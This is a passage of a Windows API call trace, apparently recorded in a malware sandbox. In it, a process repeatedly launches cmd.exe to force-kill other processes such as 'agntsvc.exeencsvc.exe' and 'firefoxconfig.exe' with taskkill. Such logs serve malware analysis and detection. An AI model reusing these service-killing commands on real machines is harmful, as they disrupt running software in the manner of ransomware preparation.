hTemplateFile=0x0) returned 0x130 [0176.832] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0176.832] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0176.832] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0176.832] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0176.833] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0176.833] GetEnvironmentStringsW () returned 0x8ea900* [0176.833] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0176.833] GetCurrentProcess () returned 0xffffffff [0176.833] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448a80, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448a80*=0x13c) returned 1 [0176.833] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448a84, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448a84*=0x140) returned 1 [0176.833] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448a88, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448a88*=0x144) returned 1 [0176.834] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im agntsvc.exeencsvc.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12462000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im agntsvc.exeencsvc.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x158, hThread=0x154, dwProcessId=0x188, dwThreadId=0xb0c)) returned 1 [0176.950] SetEvent (hEvent=0x150) returned 1 [0176.950] CloseHandle (hObject=0x154) returned 1 [0176.951] CloseHandle (hObject=0x144) returned 1 [0176.951] CloseHandle (hObject=0x140) returned 1 [0176.951] CloseHandle (hObject=0x13c) returned 1 [0176.951] CloseHandle (hObject=0x130) returned 1 [0176.951] CloseHandle (hObject=0x134) returned 1 [0176.951] CloseHandle (hObject=0x138) returned 1 [0176.951] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0xffffffff) returned 0x0 [0180.142] SetEvent (hEvent=0x150) returned 1 [0180.143] GetExitCodeProcess (in: hProcess=0x158, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0180.143] GetProcessTimes (in: hProcess=0x158, lpCreationTime=0x1245c160, lpExitTime=0x1245c168, lpKernelTime=0x1245c170, lpUserTime=0x1245c178 | out: lpCreationTime=0x1245c160, lpExitTime=0x1245c168, lpKernelTime=0x1245c170, lpUserTime=0x1245c178) returned 1 [0180.143] CloseHandle (hObject=0x158) returned 1 [0180.144] SetEvent (hEvent=0x128) returned 1 [0180.144] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0180.160] SetEvent (hEvent=0x150) returned 1 [0180.160] SetEvent (hEvent=0x128) returned 1 [0180.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e96c0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0180.161] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450788 | out: lpFileInformation=0x12450788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.162] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.162] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124507d8 | out: lpFileInformation=0x124507d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.162] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.162] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450828 | out: lpFileInformation=0x12450828*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.162] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.162] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12450878 | out: lpFileInformation=0x12450878*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.162] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.162] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124508c8 | out: lpFileInformation=0x124508c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.162] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.162] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12450918 | out: lpFileInformation=0x12450918*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.163] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.163] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12450968 | out: lpFileInformation=0x12450968*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.163] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.163] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124509b8 | out: lpFileInformation=0x124509b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.163] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.163] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12450a08 | out: lpFileInformation=0x12450a08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.163] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.163] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12450a58 | out: lpFileInformation=0x12450a58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.164] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.164] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12450aa8 | out: lpFileInformation=0x12450aa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.164] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.164] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12450af8 | out: lpFileInformation=0x12450af8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.164] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0180.164] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e9790, nSize=0x64 | out: lpBuffer="") returned 0x63 [0180.165] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450b48 | out: lpFileInformation=0x12450b48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0180.165] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e9860, nSize=0x64 | out: lpBuffer="") returned 0x35 [0180.165] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450b98 | out: lpFileInformation=0x12450b98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0180.165] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0180.166] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0180.166] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.166] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0180.166] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0180.166] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0180.166] GetEnvironmentStringsW () returned 0x8ea900* [0180.168] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0180.169] GetCurrentProcess () returned 0xffffffff [0180.169] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x158, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456990, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456990*=0x130) returned 1 [0180.169] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456994, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456994*=0x13c) returned 1 [0180.169] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456998, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456998*=0x140) returned 1 [0180.172] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im firefoxconfig.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x1246e000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im firefoxconfig.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x154, hThread=0x144, dwProcessId=0xb74, dwThreadId=0xd08)) returned 1 [0180.229] SetEvent (hEvent=0x150) returned 1 [0180.229] CloseHandle (hObject=0x144) returned 1 [0180.229] CloseHandle (hObject=0x140) returned 1 [0180.229] CloseHandle (hObject=0x13c) returned 1 [0180.229] CloseHandle (hObject=0x130) returned 1 [0180.229] CloseHandle (hObject=0x158) returned 1 [0180.229] CloseHandle (hObject=0x138) returned 1 [0180.229] CloseHandle (hObject=0x134) returned 1 [0180.230] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0181.928] SetEvent (hEvent=0x150) returned 1 [0181.928] GetExitCodeProcess (in: hProcess=0x154, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0181.928] GetProcessTimes (in: hProcess=0x154, lpCreationTime=0x124660c0, lpExitTime=0x124660c8, lpKernelTime=0x124660d0, lpUserTime=0x124660d8 | out: lpCreationTime=0x124660c0, lpExitTime=0x124660c8, lpKernelTime=0x124660d0, lpUserTime=0x124660d8) returned 1 [0181.928] CloseHandle (hObject=0x154) returned 1 [0181.929] SetEvent (hEvent=0x128) returned 1 [0181.929] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0181.943] SetEvent (hEvent=0x128) returned 1 [0181.943] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bb930, nSize=0x64 | out: lpBuffer="") returned 0x35 [0181.943] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446c38 | out: lpFileInformation=0x12446c38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.943] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.943] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12446c88 | out: lpFileInformation=0x12446c88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.943] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.944] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446cd8 | out: lpFileInformation=0x12446cd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.944] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.944] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12446d28 | out: lpFileInformation=0x12446d28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.944] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.944] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12446d78 | out: lpFileInformation=0x12446d78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.944] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.944] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12446dc8 | out: lpFileInformation=0x12446dc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.944] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.944] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12446e18 | out: lpFileInformation=0x12446e18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.944] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.944] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12446e68 | out: lpFileInformation=0x12446e68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.944] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.945] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12446eb8 | out: lpFileInformation=0x12446eb8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.945] 